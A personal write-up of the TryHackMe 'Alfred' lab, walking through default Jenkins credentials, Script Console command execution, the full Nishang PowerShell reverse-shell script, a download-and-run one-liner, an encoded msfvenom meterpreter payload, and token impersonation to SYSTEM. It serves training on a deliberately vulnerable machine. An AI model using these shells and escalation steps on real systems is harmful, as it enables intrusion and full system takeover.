Alfred writeup [thm]
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Alfred, the second challenge in the Advanced Exploitation section in the Offensive Pentesting Path, is yet another excursion into Windows land. This challenge includes lots of shells, Metasploit, a cool privesc technique and Batman!
Task 1 Initial Access
In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we'll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we'll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the reverse shell scripts
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
How many ports are open? (TCP only)
From the nmap man page:
-PS port list (TCP SYN Ping) This option sends an empty TCP packet with the SYN flag set. The default destination port is 80 (configurable at compile time by changing DEFAULT_TCP_PROBE_PORT_SPEC in nmap.h). Alternate ports can be specified as a parameter. The syntax is the same as for the -p except that port type specifiers like T: are not allowed. Examples are -PS22 and -PS22-25,80,113,1050,35000. Note that there can be no space between -PS and the port list. If multiple probes are specified they will be sent in parallel. The SYN flag suggests to the remote system that you are attempting to establish a connection. Normally the destination port will be closed, and a RST (reset) packet sent back. If the port happens to be open, the target will take the second step of a TCP three-way-handshake by responding with a SYN/ACK TCP packet. The machine running Nmap then tears down the nascent connection by responding with a RST rather than sending an ACK packet which would complete the three-way-handshake and establish a full connection. The RST packet is sent by the kernel of the machine running Nmap in response to the unexpected SYN/ACK, not by Nmap itself. Nmap does not care whether the port is open or closed. Either the RST or SYN/ACK response discussed previously tell Nmap that the host is available and responsive. On Unix boxes, only the privileged user root is generally able to send and receive raw TCP packets. For unprivileged users, a workaround is automatically employed whereby the connect system call is initiated against each target port. This has the effect of sending a SYN packet to the target host, in an attempt to establish a connection. If connect returns with a quick success or an ECONNREFUSED failure, the underlying TCP stack must have received a SYN/ACK or RST and the host is marked available. If the connection attempt is left hanging until a timeout is reached, the host is marked as down.
Let's try it out.
$: nmap -PS $target Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 22:05 CEST Nmap scan report for $target Host is up (0.041s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 8080/tcp open http-proxy
What is the username and password for the log in panel(in the format username:password)
When we go to the web server running on port 80 we are greeted with a picture of Bruce Wayne and the following text:
RIP Bruce Wayne
Donations to alfred@wayneenterprises.com are greatly appreciated.
Poor old Alfred.
The ms-wbt-server doesn't seem to respond but at port 8080 we find a Jenkins login page.
No need to brute force the credentials here, take a lucky guess. It's one of the worst and least secure user:password combinations imaginable.
Find a feature of the tool that allows you to execute commands on the underlying system.
When you find this feature, you can use this command to get the reverse shell on your machine and then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
By clicking around we find a thing called Script Console located at http://$target:8080/computer/(master)/script in which we can execute commands.
Script Console Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example: println System.getenv("PATH") println "uname -a".execute().text This execution happens in the agent JVM. All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.
E.g
println System.getenv("PATH")
returns
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
Download and serve up Powershell revshell
You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server
We need a PowerShell reverse shell. By googling for 'Invoke-PowerShellTcp.ps1' we find this nishang script:
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://github.com/nettitude/powershell/blob/master/powerfun.ps1 https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } }
Save this as Invoke-PowerShellTcp.ps1. A neat thing about this script is that we can input host and port number as parameters upon execution. I think this is a nice touch.
Serve it up.
$: python3 -m http.server 8080
Start a listener.
$: nc -nlvp 1234 listening on [any] 1234 ...
We will now try to execute the above mentioned command in the Jenkins Script Console. How to format it so that it works?
Let's try this.
In the Script Console execute:
System.out "powershell iex (New-Object Net.WebClient).DownloadString('http://$tunip:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $tunip -Port 1234".execute().text
In our Python web server we see the GET request.
$target - - [25/May/2021 23:11:59] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
In our Netcat listener we got a shell.
connect to [$tunip] from (UNKNOWN) [$target] 49258
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins>
Phew!
What is the user.txt flag?
PS C:\Program Files (x86)\Jenkins> cd C:\Users
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 8:05 PM bruce
d---- 10/25/2019 10:21 PM DefaultAppPool
d-r-- 11/21/2010 7:16 AM Public
PS C:\Users> cd bruce/Desktop
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users\bruce\Desktop> cat user.txt
[REDACTED]
Task 2 Switching Shells
To make the privilege escalation easier, let's switch to a meterpreter shell using the following process.
Create a windows meterpreter revshell
Use msfvenom to create the a windows meterpreter reverse shell using the following payload
$: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$tunip LPORT=4321 -f exe -o evil.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: [REDACTED] bytes
Saved as: evil.exe
This payload generates an encoded x86-64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won't flag it as malicious.
Download the revshell to the target machine
After creating this payload, download it to the machine using the same method in the previous step:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Assuming our Python web server is still up running and that evil.exe lives in the same directory. In our previous netcat revshell execute:
PS C:\Users\bruce\Desktop> (New-Object System.Net.WebClient).Downloadfile('http://$tunip:8080/evil.exe','evil.exe')
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 5/26/2021 11:13 PM 73802 evil.exe
-a--- 10/25/2019 11:22 PM 32 user.txt
Setup handler in Metasploit
Before running this program, ensure the handler is set up in metasploit:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
Alright, it's time to fire up Metasploit.
$: msfconsole init
[!] The following modules could not be loaded!../
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/nstr/.msf4/logs/framework.log for details.
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.0.36-dev ]
+ -- --=[ 2106 exploits - 1131 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => $tunip
msf6 exploit(multi/handler) > set LPORT 4321
LPORT => 4321
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on $tunip:4321
Start Metasploit revshell
In the Netcat revshell:
PS C:\Users\bruce\Desktop> Start-Process "evil.exe"
In Metasploit we see:
[*] Sending stage (175174 bytes) to $target
[*] Meterpreter session 1 opened ($tunip:4321 -> $target:49210) at 2021-05-27 00:20:57 +0200
meterpreter >
What is the final size of the exe payload that you generated?
[REDACTED]
Task 3 Privilege Escalation
Now that we have initial access, let's use token impersonation to gain system access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).
This access token consists of:
- user SIDs(security identifier)
- group SIDs
- privileges
amongst other things. More detailed information can be found here
There are two types of access tokens:
- primary access tokens: those associated with a user account that are generated on log on
- impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client's security context on the local system
- SecurityDelegation: current user/client can impersonate the client's security context on a remote system
where the security context is a data structure that contains users' relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here
View all the privileges using whoami /priv
meterpreter > shell
Process 1296 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\bruce\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
C:\Users\bruce\Desktop>
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your metasploit is up to date.
C:\Users\bruce\Desktop>^Z
Background channel 3? [y/N] y
meterpreter > load incognito
Loading extension incognito...Success.
To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\swprv
NT SERVICE\TrkWks
NT SERVICE\TrustedInstaller
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WdiSystemHost
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
656 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
808 1460 evil.exe x86 0 alfred\bruce C:\Users\bruce\Desktop\evil.exe
848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
916 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
980 1160 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
988 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1120 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1160 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1208 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1236 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1296 808 cmd.exe x86 0 alfred\bruce C:\Windows\SysWOW64\cmd.exe
1352 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1424 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1436 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1448 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1460 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1480 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1624 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe
1716 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1756 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1796 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1828 1624 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java.exe
1836 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1856 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1912 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
1940 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2344 772 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2704 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2748 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3036 668 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
meterpreter > migrate 668
[*] Migrating from 808 to 668...
[*] Migration completed successfully.
Read the root.txt file at C:\Windows\System32\config
meterpreter > shell
Process 1416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Windows\System32\config
cd C:\Windows\System32\config
C:\Windows\System32\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is E033-3EDD
Directory of C:\Windows\System32\config
05/26/2021 11:04 PM <DIR> .
05/26/2021 11:04 PM <DIR> ..
10/25/2019 10:46 PM 28,672 BCD-Template
05/26/2021 11:14 PM 18,087,936 COMPONENTS
05/26/2021 11:21 PM 262,144 DEFAULT
07/14/2009 03:34 AM <DIR> Journal
05/26/2021 11:21 PM <DIR> RegBack
10/26/2019 12:36 PM 70 root.txt
05/26/2021 11:03 PM 262,144 SAM
05/26/2021 11:13 PM 262,144 SECURITY
05/26/2021 11:28 PM 38,797,312 SOFTWARE
05/26/2021 11:38 PM 10,485,760 SYSTEM
11/21/2010 03:41 AM <DIR> systemprofile
10/25/2019 09:47 PM <DIR> TxR
8 File(s) 68,186,182 bytes
6 Dir(s) 20,426,633,216 bytes free
C:\Windows\System32\config>more root.txt
more root.txt
[REDACTED]
Conclusion
This was fun challenge. It's more of a follow along and fill in the blanks kind of challenge than a proper CTF but very nice nevertheless.
I did some stumbling along the way. First of all I tried to use the Powershell revshells found here and couldn't get any of them to work. I didn't read the question properly where there's a very clear hint that you should use Nishang's Invoke-PowerShellTcp.ps1.
Secondly I forgot about my Netcat revshell and tried in vain to download and start the meterpreter revshell from the Jenkins Script Console.
Besides from these two very sloppy mistakes everything went smoothly.
I would lite if I said that I completely understand Windows token impersonation now but for me the main take-away from Alfred is that this is a thing. Something to keep in mind and have in your bag of tricks and could maybe, at least theoretically, be used as privesc technique in the future.
Good challenge!
Tools used
- (Man)
- (Firefox)
- Nmap
- Jenkins Script Console
- Nishang's Invoke-PowerShellTcp.ps1
- Python
- Netcat
- Powershell
- Msfvenom
- Metasploit